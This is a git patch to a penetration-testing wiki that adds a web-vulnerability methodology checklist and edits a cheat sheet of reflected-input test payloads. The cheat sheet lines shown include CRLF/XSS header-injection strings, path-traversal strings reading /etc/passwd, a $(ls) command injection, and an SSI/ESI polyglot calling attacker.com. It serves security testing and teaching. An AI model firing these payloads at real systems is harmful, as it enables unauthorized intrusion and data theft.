From 8a3bbdc0ecb0b59be5c4c08021f035cd06d7d718 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Sat, 26 Jun 2021 12:03:36 +0000
Subject: [PATCH] GitBook: [master] 4 pages modified

---
 SUMMARY.md                                    |   1 +
 pentesting-web/2fa-bypass.md                  |   2 +-
 .../pocs-and-polygloths-cheatsheet.md         |  36 +++++-
 .../web-vulnerabilities-methodology.md        | 121 ++++++++++++++++++
 4 files changed, 155 insertions(+), 5 deletions(-)
 create mode 100644 pentesting-web/web-vulnerabilities-methodology.md

diff --git a/SUMMARY.md b/SUMMARY.md
index abe3d3cf8..c02d0e305 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -336,6 +336,7 @@
 
 ## Pentesting Web
 
+* [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
 * [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet.md)
 * [2FA/OTP Bypass](pentesting-web/2fa-bypass.md)
 * [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
diff --git a/pentesting-web/2fa-bypass.md b/pentesting-web/2fa-bypass.md
index 02ff4da37..24694cf8c 100644
--- a/pentesting-web/2fa-bypass.md
+++ b/pentesting-web/2fa-bypass.md
@@ -47,7 +47,7 @@ There is a rate limit but when you "resend the code" the same code is sent and t
 
 #### Client side rate limit bypass
 
-[Read this post.](rate-limit-bypass.md)
+{% page-ref page="rate-limit-bypass.md" %}
 
 #### Lack of rate limit in user's account
 
diff --git a/pentesting-web/pocs-and-polygloths-cheatsheet.md b/pentesting-web/pocs-and-polygloths-cheatsheet.md
index 5706ebdd7..c03215c96 100644
--- a/pentesting-web/pocs-and-polygloths-cheatsheet.md
+++ b/pentesting-web/pocs-and-polygloths-cheatsheet.md
@@ -3,6 +3,25 @@
 The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**.  
 You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections** here as even if some content might be reflected it depends heavily on the backend DB technology and structure.
 
+
+
+
+
+* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)\*\*\*\*
+* [ ] \*\*\*\*[**Command Injection**](command-injection.md)\*\*\*\*
+* [ ] \*\*\*\*[**CRLF**](crlf-0d-0a.md)\*\*\*\*
+* [ ] \*\*\*\*[**Dangling Markup**](dangling-markup-html-scriptless-injection.md)\*\*\*\*
+* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)\*\*\*\*
+* [ ] [**Open Redirect**](open-redirect.md)\*\*\*\*
+* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)\*\*\*\*
+* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery.md)\*\*\*\*
+* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)\*\*\*\*
+* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)\*\*\*\*
+* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\*
+* [ ] [**XSS**](xss-cross-site-scripting/)\*\*\*\*
+* [ ] \*\*\*\*[**XSSI**](xssi-cross-site-script-inclusion.md)\*\*\*\*
+* [ ] \*\*\*\*[**XS-Search**](xs-search.md)\*\*\*\*
+
 ## Polygloths list
 
 ```python
@@ -13,6 +32,7 @@ You **won't find Content-Type dependant injections like XXE**, as usually you wi
 %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
 %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
 %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
+<br><b><h1>THIS IS AND INJECTED TITLE </h1>
 /etc/passwd
 ../../../../../../etc/hosts
 ..\..\..\..\..\..\etc/hosts
@@ -92,6 +112,14 @@ $(ls)
 %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
 ```
 
+## Dangling Markup
+
+### Basic Tests
+
+```markup
+<br><b><h1>THIS IS AND INJECTED TITLE </h1>
+```
+
 ## [File Inclusion/Path Traversal](file-inclusion/)
 
 ### Basic Tests
@@ -109,10 +137,6 @@ http://asdasdasdasd.burpcollab.com/mal.php
 \\asdasdasdasd.burpcollab.com/mal.php
 ```
 
-## [File Upload](file-upload/)
-
-{% page-ref page="file-upload/" %}
-
 ## [Open Redirect](open-redirect.md) / [Server Side Request Forgery](ssrf-server-side-request-forgery.md)
 
 ### Basic Tests
@@ -152,6 +176,10 @@ x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/C
 <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
 ```
 
+## [Server Side Request Forgery](ssrf-server-side-request-forgery.md)
+
+The same tests used for Open Redirect can be used here.
+
 ## [Server Side Template Injection](ssti-server-side-template-injection/)
 
 ### Basic Tests
diff --git a/pentesting-web/web-vulnerabilities-methodology.md b/pentesting-web/web-vulnerabilities-methodology.md
new file mode 100644
index 000000000..57356d75e
--- /dev/null
+++ b/pentesting-web/web-vulnerabilities-methodology.md
@@ -0,0 +1,121 @@
+# Web Vulnerabilities Methodology
+
+In every pentest web there is **several hidden and obvious places that might be vulnerable**. This post is meant to be a checklist to confirma that you have searched vulnerabilities in all the posible places.
+
+## Proxies
+
+{% hint style="info" %}
+Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be \(ab\)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also  need some extra vulnerability in the backend.
+{% endhint %}
+
+* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)\*\*\*\*
+* [ ] \*\*\*\*[**Cache Poisoning/Cache Deception**](cache-deception.md)\*\*\*\*
+* [ ] \*\*\*\*[**HTTP Request Smuggling**](http-request-smuggling.md)\*\*\*\*
+* [ ] \*\*\*\*[**H2C Smuggling**](h2c-smuggling.md)\*\*\*\*
+* [ ] \*\*\*\*[**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)\*\*\*\*
+* [ ] \*\*\*\*[**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\*
+
+## **User input**
+
+{% hint style="info" %}
+ Most of the web applications will **allow users to input some data that will be processed later.**  
+Depending on the structure of the data the server is expecting some vulnerabilities  may or may not apply.
+{% endhint %}
+
+### **Reflected Values**
+
+If the introduced data may somehow being reflected in the response, the page might be vulnerable to several issues.
+
+* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)\*\*\*\*
+* [ ] \*\*\*\*[**Command Injection**](command-injection.md)\*\*\*\*
+* [ ] \*\*\*\*[**CRLF**](crlf-0d-0a.md)\*\*\*\*
+* [ ] \*\*\*\*[**Dangling Markup**](dangling-markup-html-scriptless-injection.md)\*\*\*\*
+* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)\*\*\*\*
+* [ ] [**Open Redirect**](open-redirect.md)\*\*\*\*
+* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)\*\*\*\*
+* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery.md)\*\*\*\*
+* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)\*\*\*\*
+* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)\*\*\*\*
+* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\*
+* [ ] [**XSS**](xss-cross-site-scripting/)\*\*\*\*
+* [ ] \*\*\*\*[**XSSI**](xssi-cross-site-script-inclusion.md)\*\*\*\*
+* [ ] \*\*\*\*[**XS-Search**](xs-search.md)\*\*\*\*
+
+Some of the mentioned vulnerabilities requires special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in:
+
+{% page-ref page="pocs-and-polygloths-cheatsheet.md" %}
+
+### **Search functionalities**
+
+If the functionality may be used to search some kind of data inside the backend, maybe you can \(ab\)use it to search arbitrary data.
+
+* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)\*\*\*\*
+* [ ] \*\*\*\*[**NoSQL Injection**](nosql-injection.md)\*\*\*\*
+* [ ] \*\*\*\*[**LDAP Injection**](ldap-injection.md)\*\*\*\*
+* [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md)
+* [ ] [**SQL Injection**](sql-injection/)\*\*\*\*
+* [ ] [**XAPTH Injection**](xpath-injection.md)\*\*\*\*
+
+### **Forms, WebSockets and PostMsgs**
+
+When websocket, post message or a form allows user to perform actions vulnerabilities may arise.
+
+* [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md)\*\*\*\*
+* [ ] [**Cross-site WebSocket hijacking \(CSWSH\)**](cross-site-websocket-hijacking-cswsh.md)\*\*\*\*
+* [ ] \*\*\*\*[**PostMessage Vulnerabilities**](postmessage-vulnerabilities.md)\*\*\*\*
+
+### **HTTP Headers**
+
+Depending on the HTTP headers given by the web server some vulnerabilities might be present.
+
+* [ ] [**Clickjacking**](clickjacking.md)\*\*\*\*
+* [ ] \*\*\*\*[**Content Security Policy bypass**](content-security-policy-csp-bypass.md)\*\*\*\*
+* [ ] \*\*\*\*[**Cookies Hacking**](hacking-with-cookies.md)\*\*\*\*
+* [ ] \*\*\*\*[**CORS - Misconfigurations & Bypass**](cors-bypass.md)\*\*\*\*
+
+### **Bypasses**
+
+There are several specific functionalities were some workarounds might be useful to bypass them
+
+* [ ] \*\*\*\*[**2FA/OPT Bypass**](2fa-bypass.md)\*\*\*\*
+* [ ] \*\*\*\*[**Bypass Payment Process**](bypass-payment-process.md)\*\*\*\*
+* [ ] \*\*\*\*[**Captcha Bypass**](captcha-bypass.md)\*\*\*\*
+* [ ] \*\*\*\*[**Race Condition**](race-condition.md)\*\*\*\*
+* [ ] \*\*\*\*[**Rate Limit Bypass**](rate-limit-bypass.md)\*\*\*\*
+* [ ] \*\*\*\*[**Reset Forgotten Password Bypass**](reset-password.md)\*\*\*\*
+
+### **Structured objects / Specific functionalities**
+
+Some functionalities will require the **data to be structured on a very specific format** \(like a language serialized object or a XML\). Therefore, it's more easy to identify is the application might be vulnerable as it needs to be processing that kind of data.  
+Some **specific functionalities** my be also vulnerable if a **specific format of the input is used** \(like Email Header Injections\). 
+
+* [ ] \*\*\*\*[**Deserialization**](deserialization/)\*\*\*\*
+* [ ] \*\*\*\*[**Email Header Injection**](email-header-injection.md)\*\*\*\*
+* [ ] \*\*\*\*[**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md)\*\*\*\*
+* [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md)\*\*\*\*
+
+### Files
+
+Functionalities that allow to upload files might be vulnerable to several issues.  
+Functionalities that generates files including user input might execute unexpected code.  
+Users that open files uploaded by users or automatically generated including user input might be compromised.
+
+* [ ] [**File Upload**](file-upload/)\*\*\*\*
+* [ ] \*\*\*\*[**Formula Injection**](formula-injection.md)\*\*\*\*
+* [ ] \*\*\*\*[**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)\*\*\*\*
+* [ ] \*\*\*\*[**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)\*\*\*\*
+
+### **External Identity Management**
+
+* [ ] \*\*\*\*[**OAUTH to Account takeover**](oauth-to-account-takeover.md)\*\*\*\*
+* [ ] \*\*\*\*[**SAML Attacks**](saml-attacks/)\*\*\*\*
+
+### **Other Helpful Vulnerabilities**
+
+This vulnerabilities might help to exploit other vulnerabilities.
+
+* [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md)\*\*\*\*
+* [ ] \*\*\*\*[**IDOR**](idor.md)\*\*\*\*
+* [ ] [**Parameter Pollution**](parameter-pollution.md)\*\*\*\*
+* [ ] \*\*\*\*[**Unicode Normalization vulnerability**](unicode-normalization-vulnerability.md)\*\*\*\*
+